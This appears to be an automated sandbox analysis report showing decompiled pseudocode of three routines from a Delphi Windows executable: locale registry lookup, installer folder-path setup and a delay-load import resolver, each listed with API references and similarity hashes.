				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E0040A2AC(_v8);
				_push(_t112);
				_push(0x40e4e9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040DAF8( &_v542, E0040B278(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040E4F0);
					return E0040A1C8( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40e4cc);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040E0D4( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040E5DC, 0, 0, 0,  &_v20) == 0) {
								_v12 = E00406F0C(_v20);
								RegQueryValueExW(_v16, E0040E5DC, 0, 0, _v12,  &_v20);
								E0040B2DC(_t97, _v12);
							}
						} else {
							_v12 = E00406F0C(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E0040B2DC(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040E4D3);
						if(_v12 != 0) {
							E00406F28(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}




















                                                                    0x0040e2c5
                                                                    0x0040e2c7
                                                                    0x0040e2ce
                                                                    0x0040e2d0
                                                                    0x0040e2d6
                                                                    0x0040e2dd
                                                                    0x0040e2de
                                                                    0x0040e2e3
                                                                    0x0040e2e6
                                                                    0x0040e2ed
                                                                    0x0040e319
                                                                    0x0040e2ef
                                                                    0x0040e2fd
                                                                    0x0040e2fd
                                                                    0x0040e326
                                                                    0x0040e4d3
                                                                    0x0040e4d5
                                                                    0x0040e4d8
                                                                    0x0040e4db
                                                                    0x0040e4e8
                                                                    0x0040e32c
                                                                    0x0040e32e
                                                                    0x0040e346
                                                                    0x0040e34d
                                                                    0x0040e3ed
                                                                    0x0040e3ef
                                                                    0x0040e3f0
                                                                    0x0040e3f5
                                                                    0x0040e3f8
                                                                    0x0040e406
                                                                    0x0040e427
                                                                    0x0040e476
                                                                    0x0040e480
                                                                    0x0040e498
                                                                    0x0040e4a2
                                                                    0x0040e4a2
                                                                    0x0040e429
                                                                    0x0040e431
                                                                    0x0040e44b
                                                                    0x0040e455
                                                                    0x0040e455
                                                                    0x0040e4a9
                                                                    0x0040e4ac
                                                                    0x0040e4af
                                                                    0x0040e4b8
                                                                    0x0040e4bd
                                                                    0x0040e4bd
                                                                    0x0040e4cb
                                                                    0x0040e353
                                                                    0x0040e368
                                                                    0x0040e36f
                                                                    0x00000000
                                                                    0x0040e371
                                                                    0x0040e386
                                                                    0x0040e38d
                                                                    0x00000000
                                                                    0x0040e38f
                                                                    0x0040e3a4
                                                                    0x0040e3ab
                                                                    0x00000000
                                                                    0x0040e3ad
                                                                    0x0040e3c2
                                                                    0x0040e3c9
                                                                    0x00000000
                                                                    0x0040e3cb
                                                                    0x0040e3e0
                                                                    0x0040e3e7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040e3e7
                                                                    0x0040e3c9
                                                                    0x0040e3ab
                                                                    0x0040e38d
                                                                    0x0040e36f
                                                                    0x0040e34d

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
                                                                    • RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                    • API String ID: 2701450724-3496071916
                                                                    • Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                    • Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
                                                                    • Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                    • Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006AC23C, Relevance: 26.5, APIs: 6, Strings: 9, Instructions: 223COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 65%
                                                                    			E006AC23C(void* __ebx, void* __edx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				void* _t54;
				intOrPtr _t65;
				intOrPtr _t73;
				unsigned int _t77;
				void* _t80;
				char _t82;
				char _t84;
				intOrPtr _t89;
				intOrPtr _t94;
				intOrPtr _t99;
				intOrPtr _t112;
				intOrPtr _t118;
				void* _t129;
				intOrPtr _t158;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t167;
				intOrPtr _t174;
				intOrPtr _t182;
				intOrPtr _t183;

				_t128 = __ebx;
				_t182 = _t183;
				_t129 = 7;
				do {
					_push(0);
					_push(0);
					_t129 = _t129 - 1;
					_t184 = _t129;
				} while (_t129 != 0);
				_push(_t182);
				_push(0x6ac586);
				_push( *[fs:eax]);
				 *[fs:eax] = _t183;
				E005C7430( &_v12);
				E0040A5A8(0x6d6534, _v12);
				E005C745C( &_v16);
				E0040A5A8(0x6d6538, _v16);
				E005C7488( &_v20, __esi, _t182, _t184);
				E0040A5A8(0x6d653c, _v20);
				E005C7530( *0x6d67dd & 0x000000ff, __ebx,  &_v24, __esi);
				E0040A5A8(0x6d6540, _v24);
				_t54 = E00429D18();
				_t185 = _t54 - 2;
				if(_t54 != 2) {
					E0040A1C8(0x6d6544);
				} else {
					E005C6D5C(L"SystemDrive", _t129,  &_v28, _t185);
					E0040A5A8(0x6d6544, _v28);
				}
				if( *0x6d6544 == 0) {
					_t118 =  *0x6d6534; // 0x0
					E005C53A0(_t118,  &_v32);
					E0040A5A8(0x6d6544, _v32);
					_t187 =  *0x6d6544;
					if( *0x6d6544 == 0) {
						E0040A5A8(0x6d6544, 0x6ac5c4);
					}
				}
				E006AC0D0(1, L"ProgramFilesDir", _t187); // executed
				E0040A5A8(0x6d6548, _v36);
				_t188 =  *0x6d6548;
				if( *0x6d6548 == 0) {
					_t174 =  *0x6d6544; // 0x0
					E0040B4C8(0x6d6548, L"\\Program Files", _t174);
				}
				E006AC0D0(1, L"CommonFilesDir", _t188); // executed
				E0040A5A8(0x6d654c, _v40);
				if( *0x6d654c == 0) {
					_t112 =  *0x6d6548; // 0x0
					E005C4EA4(_t112,  &_v44);
					E0040B4C8(0x6d654c, L"Common Files", _v44);
				}
				_t190 =  *0x6d67dd;
				if( *0x6d67dd != 0) {
					E006AC0D0(2, L"ProgramFilesDir", _t190); // executed
					E0040A5A8(0x6d6550, _v48);
					_t191 =  *0x6d6550;
					if( *0x6d6550 == 0) {
						E0060CD28(L"Failed to get path of 64-bit Program Files directory", _t128);
					}
					E006AC0D0(2, L"CommonFilesDir", _t191); // executed
					E0040A5A8(0x6d6554, _v52);
					if( *0x6d6554 == 0) {
						E0060CD28(L"Failed to get path of 64-bit Common Files directory", _t128);
					}
				}
				if( *0x6d68ac == 0) {
					L25:
					__eflags =  *0x6d67dc;
					if( *0x6d67dc == 0) {
						_t65 =  *0x6d6534; // 0x0
						E005C4EA4(_t65,  &_v60);
						E0040B4C8(0x6d6564, L"COMMAND.COM", _v60); // executed
					} else {
						_t73 =  *0x6d6538; // 0x0
						E005C4EA4(_t73,  &_v56);
						E0040B4C8(0x6d6564, L"cmd.exe", _v56);
					}
					E006AC180(); // executed
					__eflags = 0;
					_pop(_t158);
					 *[fs:eax] = _t158;
					_push(E006AC58D);
					return E0040A228( &_v60, 0xd);
				} else {
					_t77 =  *0x6d67f0; // 0xa0042ee
					if(_t77 >> 0x10 < 0x600) {
						goto L25;
					} else {
						_t80 =  *0x6d68ac(0x6cd7f4, 0x8000, 0,  &_v8); // executed
						if(_t80 != 0) {
							_t82 =  *0x6d68ac(0x6cd804, 0x8000, 0,  &_v8); // executed
							__eflags = _t82;
							if(_t82 != 0) {
								_t84 =  *0x6d68ac(0x6cd814, 0x8000, 0,  &_v8); // executed
								__eflags = _t84;
								if(_t84 != 0) {
									goto L25;
								} else {
									_push(_t182);
									_push(0x6ac516);
									_push( *[fs:eax]);
									 *[fs:eax] = _t183;
									E0040C8BC();
									__eflags = 0;
									_pop(_t163);
									 *[fs:eax] = _t163;
									_push(E006AC51D);
									_t89 = _v8;
									_push(_t89);
									L0043C214();
									return _t89;
								}
							} else {
								_push(_t182);
								_push(0x6ac4c3);
								_push( *[fs:eax]);
								 *[fs:eax] = _t183;
								E0040C8BC();
								__eflags = 0;
								_pop(_t165);
								 *[fs:eax] = _t165;
								_push(E006AC4CA);
								_t94 = _v8;
								_push(_t94);
								L0043C214();
								return _t94;
							}
						} else {
							_push(_t182);
							_push(0x6ac470);
							_push( *[fs:eax]);
							 *[fs:eax] = _t183;
							E0040C8BC();
							_pop(_t167);
							 *[fs:eax] = _t167;
							_push(E006AC477);
							_t99 = _v8;
							_push(_t99);
							L0043C214();
							return _t99;
						}
					}
				}
			}





































                                                                    0x006ac23c
                                                                    0x006ac23d
                                                                    0x006ac23f
                                                                    0x006ac244
                                                                    0x006ac244
                                                                    0x006ac246
                                                                    0x006ac248
                                                                    0x006ac248
                                                                    0x006ac248
                                                                    0x006ac24d
                                                                    0x006ac24e
                                                                    0x006ac253
                                                                    0x006ac256
                                                                    0x006ac25c
                                                                    0x006ac269
                                                                    0x006ac271
                                                                    0x006ac27e
                                                                    0x006ac286
                                                                    0x006ac293
                                                                    0x006ac2a2
                                                                    0x006ac2af
                                                                    0x006ac2b4
                                                                    0x006ac2b9
                                                                    0x006ac2bc
                                                                    0x006ac2df
                                                                    0x006ac2be
                                                                    0x006ac2c6
                                                                    0x006ac2d3
                                                                    0x006ac2d3
                                                                    0x006ac2eb
                                                                    0x006ac2f0
                                                                    0x006ac2f5
                                                                    0x006ac302
                                                                    0x006ac307
                                                                    0x006ac30e
                                                                    0x006ac31a
                                                                    0x006ac31a
                                                                    0x006ac30e
                                                                    0x006ac329
                                                                    0x006ac336
                                                                    0x006ac33b
                                                                    0x006ac342
                                                                    0x006ac34e
                                                                    0x006ac354
                                                                    0x006ac354
                                                                    0x006ac363
                                                                    0x006ac370
                                                                    0x006ac37c
                                                                    0x006ac381
                                                                    0x006ac386
                                                                    0x006ac398
                                                                    0x006ac398
                                                                    0x006ac39d
                                                                    0x006ac3a4
                                                                    0x006ac3b0
                                                                    0x006ac3bd
                                                                    0x006ac3c2
                                                                    0x006ac3c9
                                                                    0x006ac3d0
                                                                    0x006ac3d0
                                                                    0x006ac3df
                                                                    0x006ac3ec
                                                                    0x006ac3f8
                                                                    0x006ac3ff
                                                                    0x006ac3ff
                                                                    0x006ac3f8
                                                                    0x006ac40b
                                                                    0x006ac51d
                                                                    0x006ac51d
                                                                    0x006ac524
                                                                    0x006ac54a
                                                                    0x006ac54f
                                                                    0x006ac561
                                                                    0x006ac526
                                                                    0x006ac529
                                                                    0x006ac52e
                                                                    0x006ac540
                                                                    0x006ac540
                                                                    0x006ac566
                                                                    0x006ac56b
                                                                    0x006ac56d
                                                                    0x006ac570
                                                                    0x006ac573
                                                                    0x006ac585
                                                                    0x006ac411
                                                                    0x006ac411
                                                                    0x006ac41e
                                                                    0x00000000
                                                                    0x006ac424
                                                                    0x006ac434
                                                                    0x006ac43c
                                                                    0x006ac487
                                                                    0x006ac48d
                                                                    0x006ac48f
                                                                    0x006ac4da
                                                                    0x006ac4e0
                                                                    0x006ac4e2
                                                                    0x00000000
                                                                    0x006ac4e4
                                                                    0x006ac4e6
                                                                    0x006ac4e7
                                                                    0x006ac4ec
                                                                    0x006ac4ef
                                                                    0x006ac4fa
                                                                    0x006ac4ff
                                                                    0x006ac501
                                                                    0x006ac504
                                                                    0x006ac507
                                                                    0x006ac50c
                                                                    0x006ac50f
                                                                    0x006ac510
                                                                    0x006ac515
                                                                    0x006ac515
                                                                    0x006ac491
                                                                    0x006ac493
                                                                    0x006ac494
                                                                    0x006ac499
                                                                    0x006ac49c
                                                                    0x006ac4a7
                                                                    0x006ac4ac
                                                                    0x006ac4ae
                                                                    0x006ac4b1
                                                                    0x006ac4b4
                                                                    0x006ac4b9
                                                                    0x006ac4bc
                                                                    0x006ac4bd
                                                                    0x006ac4c2
                                                                    0x006ac4c2
                                                                    0x006ac43e
                                                                    0x006ac440
                                                                    0x006ac441
                                                                    0x006ac446
                                                                    0x006ac449
                                                                    0x006ac454
                                                                    0x006ac45b
                                                                    0x006ac45e
                                                                    0x006ac461
                                                                    0x006ac466
                                                                    0x006ac469
                                                                    0x006ac46a
                                                                    0x006ac46f
                                                                    0x006ac46f
                                                                    0x006ac43c
                                                                    0x006ac41e

                                                                    APIs
                                                                    • SHGetKnownFolderPath.SHELL32(006CD7F4,00008000,00000000,?,00000000,006AC586,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A), ref: 006AC434
                                                                    • CoTaskMemFree.OLE32(?,006AC477,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC46A
                                                                    • SHGetKnownFolderPath.SHELL32(006CD804,00008000,00000000,?,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC487
                                                                    • CoTaskMemFree.OLE32(?,006AC4CA,?,00000000,00000000,?,006B7B68,00000006,?,00000000,006B813A,?,00000000,006B81F9), ref: 006AC4BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FolderFreeKnownPathTask
                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                    • API String ID: 969438705-544719455
                                                                    • Opcode ID: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                                    • Instruction ID: b9958020655176fa4da1f40778f72373ecd7cbade583b9d7093994fb637c8e1d
                                                                    • Opcode Fuzzy Hash: 7984a636196e105601b5bae3f4cd8b715fa2ccf315e8b131d7c1a39997f32fcf
                                                                    • Instruction Fuzzy Hash: A281D530E012049FDB10FFA4E852BAD7BA7EB8A714F50447AF400A7395C678AD51CF65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00410BF4, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 258COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 67%
                                                                    			E00410BF4(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t133;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x6c5c50, 8 << 2);
				_pop(_t194);
				_v56 =  *0x6c5c50;
				_v52 = E004110A4( *0x006C5C54);
				_v48 = E004110B4( *0x006C5C58);
				_v44 = E004110C4( *0x006C5C5C);
				_v40 = E004110D4( *0x006C5C60);
				_v36 = E004110D4( *0x006C5C64);
				_v32 = E004110D4( *0x006C5C68);
				_v28 =  *0x006C5C6C;
				memcpy( &_v92, 0x6c5c70, 9 << 2);
				_t196 = _t194;
				_v88 = 0x6c5c70;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x6c5c94; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E004110E4( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x6d2644 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x6d2644 != 0) {
							_t191 =  *0x6d2644(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x6d2648 != 0) {
									_t191 =  *0x6d2648(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x6c5c9c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x6d2644 != 0) {
						_t142 =  *0x6d2644(1,  &_v92);
					}
					if(_t142 == 0) {
						_t133 = LoadLibraryA(_v80); // executed
						_t142 = _t133;
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0041057C(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x6c5c4c; // 0x0
									 *_v20 = _t126;
									 *0x6c5c4c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x6d2648 != 0) {
							_t142 =  *0x6d2648(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x6c5c98; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x6d2644(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x6d2644 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x6d2644(5,  &_v92);
						}
						return _t191;
					}
				}
			}








































                                                                    0x00410c08
                                                                    0x00410c0e
                                                                    0x00410c10
                                                                    0x00410c13
                                                                    0x00410c20
                                                                    0x00410c2d
                                                                    0x00410c3a
                                                                    0x00410c47
                                                                    0x00410c54
                                                                    0x00410c61
                                                                    0x00410c6a
                                                                    0x00410c78
                                                                    0x00410c7a
                                                                    0x00410c7b
                                                                    0x00410c81
                                                                    0x00410c87
                                                                    0x00410c8e
                                                                    0x00410c90
                                                                    0x00410c96
                                                                    0x00410c9c
                                                                    0x00410cac
                                                                    0x00000000
                                                                    0x00410cb1
                                                                    0x00410cbe
                                                                    0x00410cc3
                                                                    0x00410cc5
                                                                    0x00410cc7
                                                                    0x00410cc7
                                                                    0x00410ccd
                                                                    0x00410cd0
                                                                    0x00410cd8
                                                                    0x00410ce2
                                                                    0x00410ce5
                                                                    0x00410cea
                                                                    0x00410d05
                                                                    0x00410cec
                                                                    0x00410cf8
                                                                    0x00410cf8
                                                                    0x00410d08
                                                                    0x00410d11
                                                                    0x00410d2a
                                                                    0x00410d2c
                                                                    0x00410dee
                                                                    0x00410dee
                                                                    0x00410df8
                                                                    0x00410e06
                                                                    0x00410e06
                                                                    0x00410e0a
                                                                    0x00410e57
                                                                    0x00410e59
                                                                    0x00410e60
                                                                    0x00410e6a
                                                                    0x00410e78
                                                                    0x00410e78
                                                                    0x00410e7c
                                                                    0x00410e7e
                                                                    0x00410e83
                                                                    0x00410e89
                                                                    0x00410e99
                                                                    0x00410e9e
                                                                    0x00410e9e
                                                                    0x00410e7c
                                                                    0x00000000
                                                                    0x00410e0c
                                                                    0x00410e10
                                                                    0x00410e4b
                                                                    0x00410e55
                                                                    0x00000000
                                                                    0x00410e18
                                                                    0x00410e1b
                                                                    0x00410e23
                                                                    0x00000000
                                                                    0x00410e3c
                                                                    0x00410e42
                                                                    0x00410e47
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00410ea1
                                                                    0x00410ea4
                                                                    0x00000000
                                                                    0x00410ea4
                                                                    0x00410e23
                                                                    0x00410e10
                                                                    0x00410e0a
                                                                    0x00410d39
                                                                    0x00410d47
                                                                    0x00410d47
                                                                    0x00410d4b
                                                                    0x00410d51
                                                                    0x00410d56
                                                                    0x00410d56
                                                                    0x00410d5a
                                                                    0x00410da7
                                                                    0x00410db3
                                                                    0x00410de9
                                                                    0x00410db5
                                                                    0x00410db9
                                                                    0x00410dbf
                                                                    0x00410dc4
                                                                    0x00410dc9
                                                                    0x00410dd0
                                                                    0x00410dd6
                                                                    0x00410ddb
                                                                    0x00410de0
                                                                    0x00410de0
                                                                    0x00410dc9
                                                                    0x00410db9
                                                                    0x00000000
                                                                    0x00410d5c
                                                                    0x00410d61
                                                                    0x00410d6b
                                                                    0x00410d79
                                                                    0x00410d79
                                                                    0x00410d7d
                                                                    0x00000000
                                                                    0x00410d7f
                                                                    0x00410d7f
                                                                    0x00410d84
                                                                    0x00410d8a
                                                                    0x00410d9a
                                                                    0x00000000
                                                                    0x00410d9f
                                                                    0x00410d7d
                                                                    0x00410d13
                                                                    0x00410d1f
                                                                    0x00410d23
                                                                    0x00000000
                                                                    0x00410d25
                                                                    0x00410ea6
                                                                    0x00410ead
                                                                    0x00410eb1
                                                                    0x00410eb4
                                                                    0x00410eb7
                                                                    0x00410ec0
                                                                    0x00410ec0
                                                                    0x00000000
                                                                    0x00410ec6
                                                                    0x00410d23

                                                                    APIs
                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
